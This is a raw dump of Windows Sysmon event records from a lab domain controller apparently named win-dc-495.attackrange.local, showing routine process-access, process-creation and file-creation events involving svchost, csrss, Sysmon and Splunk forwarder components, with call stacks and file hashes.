13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.938{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.940{59A5CD1D-9145-6005-4402-00000000A301}4632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.782{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.766{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9145-6005-4302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:45.563{59A5CD1D-9141-6005-4002-00000000A301}2120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\848-0\System.Activities.dll2021-01-18 13:46:45.563 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.547{59A5CD1D-9145-6005-4202-00000000A301}42524916C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:45.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:45.407{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9145-6005-4202-00000000A301}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
